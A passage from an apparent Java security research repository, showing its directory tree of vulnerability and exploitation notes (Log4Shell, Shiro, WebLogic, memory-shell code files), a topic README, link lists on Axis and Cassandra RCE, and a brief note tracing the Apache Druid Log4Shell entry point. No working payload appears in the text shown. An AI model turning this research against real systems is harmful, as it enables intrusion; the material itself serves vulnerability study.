├── README.md
├── application
├── apache
│ ├── axis
│ │ └── README.md
│ ├── cassandra
│ │ └── README.md
│ ├── druid
│ │ ├── README.md
│ │ └── vulnerability-research.assets
│ │ │ ├── image-20211216180541227.png
│ │ │ ├── image-20211221141728711.png
│ │ │ ├── image-20211221141800963.png
│ │ │ ├── image-20211221141932644.png
│ │ │ └── image-20211221142053238.png
│ ├── felix atomos
│ │ └── README.md
│ ├── james server
│ │ └── README.md
│ ├── jspwiki
│ │ ├── README.md
│ │ └── jspwiki.assets
│ │ │ ├── image-20220110115454715.png
│ │ │ ├── image-20220110122150681.png
│ │ │ ├── image-20220110131939248.png
│ │ │ ├── image-20220110132101561.png
│ │ │ ├── image-20220110132402813.png
│ │ │ ├── image-20220110132647092.png
│ │ │ ├── image-20220110132939245.png
│ │ │ ├── image-20220110133028087.png
│ │ │ ├── image-20220110142929486.png
│ │ │ ├── image-20220110143652926.png
│ │ │ ├── image-20220110143822970.png
│ │ │ ├── image-20220110150226665.png
│ │ │ ├── image-20220110151507777.png
│ │ │ ├── image-20220110151828365.png
│ │ │ ├── image-20220110153629595.png
│ │ │ ├── image-20220110154139526.png
│ │ │ ├── image-20220110155144536.png
│ │ │ ├── image-20220110155734110.png
│ │ │ ├── image-20220110155805314.png
│ │ │ ├── image-20220110161543541.png
│ │ │ ├── image-20220110161704602.png
│ │ │ ├── image-20220110161955992.png
│ │ │ ├── image-20220110171302346.png
│ │ │ ├── image-20220110171735060.png
│ │ │ ├── image-20220110172050167.png
│ │ │ └── image-20220110172151844.png
│ ├── karaf
│ │ └── README.md
│ ├── kylin
│ │ └── README.md
│ ├── olingo
│ │ └── README.md
│ ├── pinot
│ │ └── README.md
│ ├── poi
│ │ └── README.md
│ ├── solr
│ │ └── README.md
│ └── storm
│ │ └── README.md
├── atlassian
│ ├── bitbucket
│ │ └── README.md
│ ├── confluence
│ │ └── README.md
│ ├── crowd
│ │ └── README.md
│ └── jira
│ │ ├── CVE-2019-11581.md
│ │ ├── README.md
│ │ └── img
│ │ ├── image-20210919113350954-16322839765956.png
│ │ └── image-20210919120024420.png
├── cisco
│ ├── asdm
│ │ └── README.md
│ └── hyperflex hx
│ │ └── README.md
├── citrix
│ └── xenmobile
│ │ └── README.md
├── f5
│ └── README.md
├── fanruan
│ ├── README.md
│ ├── code
│ │ ├── X-FineReport.jar
│ │ ├── X-FineReport.java
│ │ └── fineReport-decrypt.py
│ └── 利用研究.md
├── h3c
│ └── 利用研究.md
├── ibm
│ └── README.md
├── landray
│ ├── README.md
│ └── 利用研究.md
├── mcafee
│ └── README.md
├── oracle
│ ├── access manager
│ │ └── README.md
│ └── e-business suite
│ │ └── README.md
├── vmware
│ ├── vcenter
│ │ ├── README.md
│ │ └── 利用研究.md
│ ├── vrealize log insight
│ │ └── README.md
│ └── workspace one access
│ │ └── README.md
├── weaver
│ ├── ecology
│ │ └── 利用研究.md
│ └── emobile
│ │ └── README.md
└── yonyou
│ ├── code
│ └── ncDatabase.jar
│ └── 利用研究.md
├── component
├── batik
│ └── README.md
├── commons-jxpath
│ └── README.md
├── hutool
│ └── README.md
└── urlrewritefilter
│ └── README.md
├── development
└── javassist
│ └── README.md
├── framework
├── log
│ ├── log4j1
│ │ ├── CVE-2019-17571.md
│ │ ├── CVE-2022-23307.md
│ │ └── README.md
│ ├── log4j2
│ │ ├── CVE-2021-44228.md
│ │ └── README.md
│ └── logback
│ │ └── 利用研究.md
├── microservice
│ ├── dropwizard
│ │ └── README.md
│ ├── flink
│ │ └── README.md
│ ├── jenkins
│ │ └── README.md
│ ├── shenyu
│ │ └── README.md
│ ├── skywalking
│ │ ├── README.md
│ │ └── skywalking.assets
│ │ │ ├── image-20220113130647264.png
│ │ │ ├── image-20220113144532353.png
│ │ │ ├── image-20220113144942928.png
│ │ │ ├── image-20220113145030966.png
│ │ │ ├── image-20220113155050988.png
│ │ │ ├── image-20220114133448365.png
│ │ │ ├── image-20220114140427507.png
│ │ │ ├── image-20220114144223966.png
│ │ │ └── image-20220114152004486.png
│ ├── spark
│ │ └── README.md
│ └── spring cloud
│ │ ├── function
│ │ └── README.md
│ │ └── gateway
│ │ └── README.md
├── rpc
│ └── dubbo
│ │ ├── CVE-2021-43297.md
│ │ ├── README.md
│ │ └── img
│ │ ├── 7yut5.png
│ │ ├── image-20220104011320460.png
│ │ ├── image-20220118145950795.png
│ │ ├── image-20220118150055029.png
│ │ └── image-20220118162819016.png
├── security
│ ├── shiro
│ │ ├── README.md
│ │ ├── img
│ │ │ ├── 1d55510c8cc34de68d7a8bc524dc70bf.png
│ │ │ ├── 2b21b16367074384ac407365178e92e1.png
│ │ │ ├── 601125e5b570489bb7e86579bb2dea6e.png
│ │ │ ├── 662a7151089b4e999ac3aecef5628e8d.png
│ │ │ ├── image-20211022233907942.png
│ │ │ ├── image-20211118144237427.png
│ │ │ ├── image-20211118144314386.png
│ │ │ ├── image-20211118144525625.png
│ │ │ ├── image-20211118145028082.png
│ │ │ ├── image-20211118145106465.png
│ │ │ ├── image-20211118145151098.png
│ │ │ ├── image-20211118145958901.png
│ │ │ ├── image-20211118150027658.png
│ │ │ ├── image-20211118150058675.png
│ │ │ ├── image-20211118150110191.png
│ │ │ ├── image-20211118150245948.png
│ │ │ ├── image-20211118150319178.png
│ │ │ ├── image-20211118153223684.png
│ │ │ ├── image-20211118154359697.png
│ │ │ ├── image-20211118154624802.png
│ │ │ ├── image-20211118154847035.png
│ │ │ ├── image-20211118154924247.png
│ │ │ ├── image-20211118155031602.png
│ │ │ ├── image-20211118155359227.png
│ │ │ ├── image-20211118155853780.png
│ │ │ └── image-20211118160532010.png
│ │ └── 利用研究.md
│ └── spring security
│ │ ├── README.md
│ │ ├── auth-bypass again.md
│ │ └── img
│ │ └── CVE-2022-22978.png
├── web service
│ ├── axis
│ │ └── README.md
│ ├── cxf
│ │ └── README.md
│ ├── jersey
│ │ └── README.md
│ ├── wink
│ │ └── README.md
│ └── xfire
│ │ └── README.md
└── web
│ ├── dwr
│ └── README.md
│ ├── ruoyi
│ └── README.md
│ ├── spring boot
│ ├── README.md
│ ├── SpringBoot 1.x Whitelabel Error Page SpEL RCE.md
│ ├── SpringBoot MultipartFile.getOriginalFilename() 差异梳理.md
│ └── img
│ │ ├── Pasted image 20220818202936.png
│ │ ├── Pasted image 20220818202952.png
│ │ ├── Pasted image 20220818203007.png
│ │ ├── Pasted image 20220818203017.png
│ │ └── Pasted image 20220818203038.png
│ ├── spring webflux
│ └── README.md
│ ├── spring
│ ├── spring framework
│ │ ├── CommonsMultipartFile.getOriginalFilename 绕过.md
│ │ ├── README.md
│ │ └── img
│ │ │ ├── Pasted image 20220818204052.png
│ │ │ ├── Pasted image 20220818204102.png
│ │ │ └── Pasted image 20220818204110.png
│ └── spring messaging
│ │ ├── README.md
│ │ └── vulnerability-research.assets
│ │ ├── image-20211116215130852.png
│ │ ├── image-20211116215228659.png
│ │ └── image-20211116215431393.png
│ └── struts2
│ ├── CVE-2021-44228.md
│ └── img
│ ├── 145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png
│ ├── 145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png
│ ├── 145717032-722780ec-d87b-4dca-af86-0354e33491fc.png
│ ├── 145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png
│ ├── 145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png
│ ├── 145717306-5a735d51-7867-40b8-85d7-ed3533875387.png
│ ├── 145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png
│ ├── 145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png
│ ├── 145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png
│ ├── 145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png
│ ├── 145718094-0007d715-0105-4d0f-8587-af4162f8e077.png
│ ├── 145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png
│ ├── 145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png
│ └── 145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png
├── javaee
├── base64
│ └── README.md
├── bcel
│ ├── README.md
│ └── X-BCEL.jar
├── design pattern
│ └── README.md
├── expression language
│ ├── ognl
│ │ └── README.md
│ └── spel
│ │ └── README.md
├── java servlet
│ └── README.md
├── jdbc
│ ├── h2
│ │ └── README.md
│ ├── mysql
│ │ └── README.md
│ └── postgresql
│ │ └── README.md
├── jsp
│ └── README.md
├── rasp
│ └── README.md
├── template engine
│ ├── freemarker
│ │ └── README.md
│ ├── groovy
│ │ ├── README.md
│ │ └── source-analysis.assets
│ │ │ ├── image-20211108103208739-16395903238381.png
│ │ │ ├── image-20211108103242423.png
│ │ │ ├── image-20211108103517041.png
│ │ │ ├── image-20211108103833882.png
│ │ │ ├── image-20211108103854979.png
│ │ │ ├── image-20211214204856501.png
│ │ │ ├── image-20211215225939460.png
│ │ │ ├── image-20211215232032453-16395903266652.png
│ │ │ ├── image-20211215232209050-16395903359864.png
│ │ │ ├── image-20211215233015850.png
│ │ │ ├── image-20211215234351142-16395903291333.png
│ │ │ └── image-20211216014448682.png
│ └── velocity
│ │ └── README.md
└── vulnerability
│ ├── README.md
│ ├── img
│ ├── image-20211108002026565.png
│ ├── image-20220119163614488.png
│ ├── image-20220119164953772.png
│ ├── image-20220119172348169.png
│ ├── image-20220120170955546.png
│ ├── image-20220120171337998.png
│ ├── image-20220215152128829.png
│ ├── image-20220215152156507.png
│ ├── image-20220215152949881.png
│ ├── image-20220215153502354.png
│ ├── image-20220215153915204.png
│ ├── image-20220215154950054.png
│ ├── image-20220215155935625.png
│ └── image-20220215162206252.png
│ └── jdwp rce.md
├── mechanism
├── databinding
│ └── README.md
└── serialization
│ ├── fastjson
│ └── note
│ │ ├── img
│ │ ├── 32e2b52cedb344d5be39ed880c30e134.png
│ │ ├── 41a2f918a49c41b7ac62521bafa778cb.png
│ │ ├── 4a81b196a3ef4e4b9e172a4a52e1acaf.png
│ │ ├── 851600c7f7064b3880112b15398e90cc.png
│ │ ├── 93afd2976fce487d85794a41f6700d65.png
│ │ ├── 96fe4f4cf45e4c5f90be821790f7f886.png
│ │ ├── b10c111ecfdc47dbae548a7399f87d6c.png
│ │ ├── b3b9433c7dbc44f996f5b3f62dddab12.png
│ │ ├── b942e530762240f5958692b6ce15a035.png
│ │ ├── dbda66813d5f44b5907b320492185242.png
│ │ ├── dcf784b91c1549b3bb3a38dee5f28511.png
│ │ ├── eaaa5eee918f49238b531632a1b3eb76.png
│ │ ├── f9f936a04b554b6482f90ec8e5b020c7.png
│ │ ├── image-20220108230455188.png
│ │ ├── image-20220108231345721.png
│ │ ├── image-20220110010458402.png
│ │ ├── image-20220110010946944.png
│ │ ├── image-20220110011301258.png
│ │ ├── image-20220110011637089.png
│ │ ├── image-20220110012516629.png
│ │ ├── image-20220110013037847.png
│ │ ├── image-20220110013253942.png
│ │ ├── image-20220110014102136.png
│ │ ├── image-20220110014358909.png
│ │ ├── image-20220110014625513.png
│ │ ├── image-20220110015047912.png
│ │ ├── image-20220110015312401.png
│ │ ├── image-20220110015633886.png
│ │ ├── image-20220110020122733.png
│ │ ├── image-20220110020346569.png
│ │ ├── image-20220110020750595.png
│ │ ├── image-20220110021423356.png
│ │ ├── image-20220110021553549.png
│ │ ├── image-20220110022127739.png
│ │ ├── image-20220110022835890.png
│ │ ├── image-20220110023158446.png
│ │ ├── image-20220110023509406.png
│ │ ├── image-20220110023906262.png
│ │ ├── image-20220110024153294.png
│ │ ├── image-20220110025245969.png
│ │ ├── image-20220110030044227.png
│ │ ├── image-20220110031401317.png
│ │ ├── image-20220110031605273.png
│ │ ├── image-20220110032229069.png
│ │ ├── image-20220110033000831.png
│ │ ├── image-20220110033704985.png
│ │ ├── image-20220110033852412.png
│ │ ├── image-20220110033930830.png
│ │ ├── image-20220110034219641.png
│ │ ├── image-20220110034337153.png
│ │ ├── image-20220110034754508.png
│ │ ├── image-20220110034944896.png
│ │ ├── image-20220110035255396.png
│ │ ├── image-20220110040523386.png
│ │ ├── image-20220110042918567.png
│ │ └── image-20220110113731767.png
│ │ └── 利用研究.md
│ ├── jackson
│ └── note
│ │ ├── README.md
│ │ └── img
│ │ ├── image-20220124163901495.png
│ │ ├── image-20220124164807399.png
│ │ ├── image-20220124165036128.png
│ │ ├── image-20220124171929408.png
│ │ └── image-20220124173333679.png
│ ├── serialVersionUID.md
│ ├── snakeyaml
│ └── note
│ │ ├── README.md
│ │ └── img
│ │ ├── image-20220124164807399.png
│ │ ├── image-20220125143536995.png
│ │ ├── image-20220125143635368.png
│ │ ├── image-20220125143736373.png
│ │ ├── image-20220125144600810.png
│ │ ├── image-20220125144652166.png
│ │ ├── image-20220125145833353.png
│ │ ├── image-20220125154705633.png
│ │ ├── image-20220125155428326.png
│ │ ├── image-20220125155933859.png
│ │ ├── image-20220125161418417.png
│ │ ├── image-20220125161523743.png
│ │ ├── image-20220125162031082.png
│ │ ├── image-20220125162054248.png
│ │ ├── image-20220125162358464.png
│ │ ├── image-20220125170107361.png
│ │ ├── image-20220125170643827.png
│ │ ├── image-20220125171530973.png
│ │ ├── image-20220125172234426.png
│ │ └── image-20220125172659817.png
│ ├── xmldecoder
│ └── note
│ │ ├── README.md
│ │ └── img
│ │ ├── image-20220125184005984.png
│ │ ├── image-20220125184951948.png
│ │ ├── image-20220125185557645.png
│ │ ├── image-20220125191418857.png
│ │ ├── image-20220125191846714.png
│ │ ├── image-20220125192200312.png
│ │ ├── image-20220125192700432.png
│ │ ├── image-20220125192815700.png
│ │ ├── image-20220125193006423.png
│ │ ├── image-20220125193152552.png
│ │ ├── image-20220125194311588.png
│ │ ├── image-20220125195232830.png
│ │ ├── image-20220125195333263.png
│ │ ├── image-20220125195504039.png
│ │ ├── image-20220125195509031.png
│ │ ├── image-20220125195638810.png
│ │ └── image-20220125195726476.png
│ └── xstream
│ └── note
│ ├── README.md
│ └── img
│ ├── image-20220124132538895.png
│ ├── image-20220124142438898.png
│ ├── image-20220124142533040.png
│ ├── image-20220124142800151.png
│ ├── image-20220124143512341.png
│ └── image-20220124144454107.png
├── middleware
├── jboss
│ └── note
│ │ ├── README.md
│ │ └── img
│ │ ├── image-20211230142240042.png
│ │ ├── image-20211230142344888.png
│ │ ├── image-20211230142523946.png
│ │ └── image-20211230142904408.png
├── jetty
│ └── note
│ │ ├── README.md
│ │ ├── img
│ │ ├── 14dd2f7f0b6541c088e4ad7edfe3addd.png
│ │ ├── 28b9dc3344e840718628bafc5217966b.png
│ │ ├── 6f51c78bcc1446589bd8e83896d9f0b2.png
│ │ ├── image-20211216233502724.png
│ │ ├── image-20211216234712662.png
│ │ ├── image-20211217001324250.png
│ │ ├── image-20211217001503808.png
│ │ ├── image-20211217002035189.png
│ │ ├── image-20211217002249571.png
│ │ ├── image-20211217004418583.png
│ │ ├── image-20211217010553895.png
│ │ ├── image-20211217010831953.png
│ │ ├── image-20211217011014183.png
│ │ ├── image-20211217011112574.png
│ │ ├── image-20211217013218109.png
│ │ ├── image-20211217014201379.png
│ │ ├── image-20211217014312945.png
│ │ ├── image-20211217014404379.png
│ │ ├── image-20211217014610469.png
│ │ ├── image-20211217014753526.png
│ │ ├── image-20211217014939255.png
│ │ ├── image-20211217020041053.png
│ │ ├── image-20211217020157232.png
│ │ ├── image-20211217020358436.png
│ │ ├── image-20211217020502765.png
│ │ ├── image-20211217021404772.png
│ │ ├── image-20211217021835307.png
│ │ ├── image-20211217023418128.png
│ │ ├── image-20211217172652458.png
│ │ ├── image-20211217172728837.png
│ │ ├── image-20211217172917268.png
│ │ ├── image-20211217173209887.png
│ │ ├── image-20211217173619222.png
│ │ ├── image-20211217174108730.png
│ │ ├── image-20211217174219636.png
│ │ ├── image-20211217175432854.png
│ │ ├── image-20211217175856347.png
│ │ ├── image-20211217180215190.png
│ │ ├── image-20211217180939747.png
│ │ ├── image-20211217181125392.png
│ │ ├── image-20211217183240304.png
│ │ ├── image-20211218231623192.png
│ │ ├── image-20211218231832064.png
│ │ ├── image-20211218231948762.png
│ │ ├── image-20211218232235404.png
│ │ ├── image-20211218232506305.png
│ │ ├── image-20211218232817015.png
│ │ ├── image-20211218232933399.png
│ │ ├── image-20211218233321940.png
│ │ ├── image-20211218233654127.png
│ │ ├── image-20211219003844131.png
│ │ ├── image-20211219004050344.png
│ │ ├── image-20211219005439749.png
│ │ ├── image-20211219005907111.png
│ │ ├── image-20211219010628756.png
│ │ ├── image-20211219011755109.png
│ │ ├── image-20211219012432285.png
│ │ ├── image-20211219013056371.png
│ │ ├── image-20211219015429473.png
│ │ ├── image-20211219020225013.png
│ │ ├── image-20211219024758925.png
│ │ ├── image-20211221160813357.png
│ │ ├── image-20211222143350800.png
│ │ ├── image-20211223170727420.png
│ │ ├── image-20211223170921323.png
│ │ ├── image-20211223171052049.png
│ │ └── image-20211223172132330.png
│ │ ├── 利用研究.md
│ │ ├── 历史漏洞.md
│ │ └── 环境搭建.md
├── resin
│ ├── code
│ │ ├── addFilter.java
│ │ └── addServlet.java
│ └── note
│ │ ├── README.md
│ │ └── img
│ │ ├── 144174160-82c02d3b-a775-4b71-acaf-d9f03f2b3653-164000593249077.png
│ │ ├── 144174160-82c02d3b-a775-4b71-acaf-d9f03f2b3653.png
│ │ ├── 144174179-d1e5af4c-c1cc-4f41-a5da-7fa2eb977b66-164000593053376.png
│ │ ├── 144174179-d1e5af4c-c1cc-4f41-a5da-7fa2eb977b66.png
│ │ ├── 144174242-db437f8b-0feb-4683-8e46-7e7586905a15-164000592925175.png
│ │ ├── 144174242-db437f8b-0feb-4683-8e46-7e7586905a15.png
│ │ ├── 144174286-61ce59f9-da8f-47da-bb5a-60c65de85aab-164000592677374.png
│ │ ├── 144174286-61ce59f9-da8f-47da-bb5a-60c65de85aab.png
│ │ ├── 144174296-2f6a4527-c1bb-4199-b5b9-d108216991bc-164000592521673.png
│ │ ├── 144174296-2f6a4527-c1bb-4199-b5b9-d108216991bc.png
│ │ ├── 144174317-03477b55-7f9c-4550-9e06-cb21fb4cd300-164000592371772.png
│ │ ├── 144174317-03477b55-7f9c-4550-9e06-cb21fb4cd300.png
│ │ ├── 144174351-15c3b0f6-df52-4c02-9322-bb0f76a3b2bf-164000592174971.png
│ │ ├── 144174351-15c3b0f6-df52-4c02-9322-bb0f76a3b2bf.png
│ │ ├── 144174357-ba30fda0-d499-4929-8234-f0778f09039b-164000592062570.png
│ │ ├── 144174357-ba30fda0-d499-4929-8234-f0778f09039b.png
│ │ ├── 144174378-bf20140b-fedf-4507-bef2-445187820ab2-164000591919169.png
│ │ ├── 144174378-bf20140b-fedf-4507-bef2-445187820ab2.png
│ │ ├── 144174406-2259125d-b101-4073-94d5-01b8f9d67d96-164000591779667.png
│ │ ├── 144174406-2259125d-b101-4073-94d5-01b8f9d67d96.png
│ │ ├── 144174432-3c2e4d49-7cc2-48ae-928e-60c9af933411-164000591588465.png
│ │ ├── 144174432-3c2e4d49-7cc2-48ae-928e-60c9af933411.png
│ │ ├── 144174451-3cd87542-0dad-41de-ad7f-48a9359d8ef2-164000591406663.png
│ │ ├── 144174451-3cd87542-0dad-41de-ad7f-48a9359d8ef2.png
│ │ ├── 144174460-5f803d3c-8b6f-42e6-9f81-4def07970343-164000591286061.png
│ │ ├── 144174460-5f803d3c-8b6f-42e6-9f81-4def07970343.png
│ │ ├── 144174477-b242ffb6-6d62-442c-98a7-ea6a7cb11206-164000591148059.png
│ │ ├── 144174477-b242ffb6-6d62-442c-98a7-ea6a7cb11206.png
│ │ ├── 144174511-0cdabaf9-33c1-4c6e-aca5-c27c4ade0801-164000590875157.png
│ │ ├── 144174511-0cdabaf9-33c1-4c6e-aca5-c27c4ade0801.png
│ │ ├── 144174547-64dc2dba-d06b-4591-8f01-3ad408648d96-164000590703855.png
│ │ ├── 144174547-64dc2dba-d06b-4591-8f01-3ad408648d96.png
│ │ ├── 144174573-43a536d0-d35f-40e2-8ecd-0b79f1d66723-164000590498553.png
│ │ ├── 144174573-43a536d0-d35f-40e2-8ecd-0b79f1d66723.png
│ │ ├── 144174584-858aca20-2946-4f46-808d-7da2c1b733ad-164000590275651.png
│ │ ├── 144174584-858aca20-2946-4f46-808d-7da2c1b733ad.png
│ │ ├── 144178194-d2717d65-d9ed-4f3c-8903-4f4a624d848f-164000590059149.png
│ │ ├── 144178194-d2717d65-d9ed-4f3c-8903-4f4a624d848f.png
│ │ ├── 144178592-1ee0f23f-5b67-4cd7-8dc4-a0437cb67168-164000589598845.png
│ │ ├── 144178592-1ee0f23f-5b67-4cd7-8dc4-a0437cb67168.png
│ │ ├── 144178671-718bf816-6494-4676-a40f-3b46d9f10c74-164000589357743.png
│ │ ├── 144178671-718bf816-6494-4676-a40f-3b46d9f10c74.png
│ │ ├── 144179072-662fff09-1c54-4ee2-a25b-923a542aaf40-164000589084541.png
│ │ ├── 144179072-662fff09-1c54-4ee2-a25b-923a542aaf40.png
│ │ ├── 144179200-719d6a33-731d-402d-9907-cc15ea2ca4bf-164000587496637.png
│ │ ├── 144179200-719d6a33-731d-402d-9907-cc15ea2ca4bf.png
│ │ ├── 144179705-96c69246-482e-43d3-8d96-b3181bc2c07c-164000587935539.png
│ │ ├── 144179705-96c69246-482e-43d3-8d96-b3181bc2c07c.png
│ │ ├── 144181449-d6b81379-429e-49a0-b02a-72c5c860b6d2-164000589886547.png
│ │ ├── 144181449-d6b81379-429e-49a0-b02a-72c5c860b6d2.png
│ │ ├── 144183728-c145ad4b-eca7-4ee1-866c-e6c039910117.png
│ │ ├── 144183814-9994ff06-4e7a-458b-92c1-c881e1834c82.png
│ │ ├── image-20220105153754258.png
│ │ ├── image-20220105153911823.png
│ │ ├── image-20220105154711321.png
│ │ ├── image-20220105155432966.png
│ │ ├── image-20220105155510412.png
│ │ ├── image-20220105155805693.png
│ │ ├── image-20220105161112694.png
│ │ ├── image-20220105161306990.png
│ │ ├── image-20220105161712914.png
│ │ ├── image-20220105161958196.png
│ │ ├── image-20220105164537318.png
│ │ ├── image-20220105170110241.png
│ │ ├── image-20220105170219120.png
│ │ ├── image-20220105170612858.png
│ │ ├── image-20220105171626526.png
│ │ ├── image-20220105171905716.png
│ │ ├── image-20220105172215180.png
│ │ ├── image-20220105191416860.png
│ │ ├── image-20220106131156977.png
│ │ ├── image-20220106132143479.png
│ │ ├── image-20220106132647928.png
│ │ ├── image-20220106132957181.png
│ │ ├── image-20220106142101670.png
│ │ ├── image-20220106142700706.png
│ │ ├── image-20220106144849036.png
│ │ ├── image-20220106144905739.png
│ │ ├── image-20220106144931512.png
│ │ ├── image-20220106150529815.png
│ │ ├── image-20220106162933997.png
│ │ ├── image-20220106164158028.png
│ │ ├── image-20220106164513466.png
│ │ ├── image-20220106171354262.png
│ │ ├── image-20220106172008396.png
│ │ ├── image-20220106172127259.png
│ │ ├── image-20220106173607433.png
│ │ ├── image-20220106174307844.png
│ │ ├── image-20220106174411748.png
│ │ ├── image-20220106180350585.png
│ │ └── image-20220106180420193.png
├── tomcat
│ ├── Tomcat v5 不同的类加载机制.pdf
│ ├── 利用研究.md
│ └── 历史漏洞.md
├── weblogic
│ ├── code
│ │ ├── addFilter.java
│ │ └── addServlet.java
│ └── note
│ │ ├── README.md
│ │ ├── img
│ │ ├── 0c70e330d73249549ef58a85486605dc.png
│ │ ├── 144720808-7e3efafd-8126-4994-bd78-945e314ff3ac.png
│ │ ├── 144720899-5b80c842-e6dd-47c2-b2fc-e3c60ba2a8f5.png
│ │ ├── 144720974-59cb9fd5-65df-4dae-a9f8-fd103719f499.png
│ │ ├── 200837f4aab74ffa95afcd24e6bbec66.png
│ │ ├── 51de4068ad434fa5968e2f66e4ebe9ff.png
│ │ ├── 61aa3d6eed8947c0aab6cd60ecd00314.png
│ │ ├── 7e182850a43941d690d6151c8111e0cd.png
│ │ ├── 88ac5abaedd5458490bd9fba189c43e6.png
│ │ ├── image-20211026163346410.png
│ │ ├── image-20211125150525583.png
│ │ ├── image-20211125150550271.png
│ │ └── img.png
│ │ └── 环境搭建.md
├── websphere
│ ├── CVE-2020-2550.md
│ └── 回显-内存马.md
└── wildfly
│ └── note
│ ├── README.md
│ └── img
│ ├── image-20211230142344888.png
│ ├── image-20211230142523946.png
│ ├── image-20211230142904408.png
│ ├── image-20211230161228102.png
│ ├── image-20211230174050842.png
│ └── image-20211230181606604.png
├── other
├── alibaba
│ └── sentinel
│ │ └── README.md
├── crafter cms
│ └── README.md
├── datagear
│ └── README.md
├── inxedu
│ ├── 2021_08_05_Inxedu.pdf
│ ├── README.md
│ └── img
│ │ ├── 1625345482403.png
│ │ └── 1625380728348.png
├── jeecms
│ └── README.md
├── metersphere
│ └── README.md
├── ofcms
│ ├── README.md
│ └── img
│ │ ├── Untitled 1.png
│ │ ├── Untitled 10.png
│ │ ├── Untitled 11.png
│ │ ├── Untitled 12.png
│ │ ├── Untitled 13.png
│ │ ├── Untitled 14.png
│ │ ├── Untitled 15.png
│ │ ├── Untitled 16.png
│ │ ├── Untitled 17.png
│ │ ├── Untitled 18.png
│ │ ├── Untitled 19.png
│ │ ├── Untitled 2.png
│ │ ├── Untitled 20.png
│ │ ├── Untitled 21.png
│ │ ├── Untitled 22.png
│ │ ├── Untitled 23.png
│ │ ├── Untitled 24.png
│ │ ├── Untitled 25.png
│ │ ├── Untitled 26.png
│ │ ├── Untitled 27.png
│ │ ├── Untitled 28-1.png
│ │ ├── Untitled 3.png
│ │ ├── Untitled 4.png
│ │ ├── Untitled 5.png
│ │ ├── Untitled 7.png
│ │ ├── Untitled 8.png
│ │ ├── Untitled 9.png
│ │ └── Untitled.png
└── spider flow
│ ├── README.md
│ └── img
│ ├── image-20220102181550828.png
│ ├── image-20220102181612329.png
│ ├── image-20220102182241321.png
│ ├── image-20220102182630383.png
│ ├── image-20220102183719108.png
│ ├── image-20220102184309834.png
│ ├── image-20220102184652005.png
│ └── image-20220102191038717.png
└── 修复方案
├── README.md
└── 反序列化
└── readObject.md
/README.md:
--------------------------------------------------------------------------------
1 | > Focus on Java Security since November 1, 2021 👣
2 |
3 | ---
4 |
5 | JavaEE
6 | ```
7 | Servlet
8 | JSP
9 | JSF
10 | Expression Language
11 | Template Engine
12 | JDBC
13 | ```
14 |
15 | Application
16 | ```
17 | Apache
18 | Atlassian
19 | VMware
20 | Weaver
21 | Yonyou
22 | Landray
23 | ```
24 |
25 | Component
26 | ```
27 | Apache Commons JXPath
28 | Apache Batik
29 | UrlRewriteFilter
30 | ```
31 |
32 | Framework
33 | ```
34 | Log
35 | Microservice
36 | RPC
37 | Security
38 | Web
39 | ```
40 |
41 |
42 | Middleware
43 | ```
44 | Jboss
45 | Jetty
46 | Resin
47 | Tomcat
48 | WebLogic
49 | Wildfly
50 | ```
51 |
52 | Mechanism
53 | ```
54 | Serialization
55 | DataBinding
56 | BeanValidation
57 | ```
58 |
59 |
60 |
61 |
62 |
--------------------------------------------------------------------------------
/application/apache/axis/README.md:
--------------------------------------------------------------------------------
1 | 前置基础
2 | ---
3 |
4 |
5 | 相关漏洞
6 | ---
7 |
8 | - [01 Axis Rce分析](http://www.lmxspace.com/2019/07/20/Axis-Rce%E5%88%86%E6%9E%90/)
9 | - [02 axis 1.4 AdminService未授权访问 jndi注入利用](https://xz.aliyun.com/t/7981)
10 | - [03 攻击Axis服务的几种方式](https://www.x1a0t.com/2020/07/10/Attack-Axis-Service/)
11 |
--------------------------------------------------------------------------------
/application/apache/cassandra/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### CVE-2021-44521 RCE
5 |
6 | - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
7 |
8 |
--------------------------------------------------------------------------------
/application/apache/druid/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | ### Rce via Log4shell
5 |
6 | 根据公开的payload
7 |
8 | 
9 |
10 | 定位source
11 |
12 | ```
13 | sodu -rn "aaa.aaa.aaa" ~/Desktop/apache-druid-0.21.1/
14 | ```
15 |
16 | 
17 |
18 |
19 |
20 | 
21 |
22 | 找到
23 |
24 | - org.apache.druid.server.lookup.cache.LookupCoordinatorManager
25 |
26 | IDEA全局
27 |
28 | 
29 |
30 | 最后成功定位到source
31 |
32 | - org.apache.druid.server.lookup.cache.LookupCoordinatorManager#deleteTier
33 |
34 | 
35 |
36 |
--------------------------------------------------------------------------------
/application/apache/druid/vulnerability-research.assets/image-20211216180541227.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/druid/vulnerability-research.assets/image-20211216180541227.png
--------------------------------------------------------------------------------
/application/apache/druid/vulnerability-research.assets/image-20211221141728711.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/druid/vulnerability-research.assets/image-20211221141728711.png
--------------------------------------------------------------------------------
/application/apache/druid/vulnerability-research.assets/image-20211221141800963.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/druid/vulnerability-research.assets/image-20211221141800963.png
--------------------------------------------------------------------------------
/application/apache/druid/vulnerability-research.assets/image-20211221141932644.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/druid/vulnerability-research.assets/image-20211221141932644.png
--------------------------------------------------------------------------------
/application/apache/druid/vulnerability-research.assets/image-20211221142053238.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/druid/vulnerability-research.assets/image-20211221142053238.png
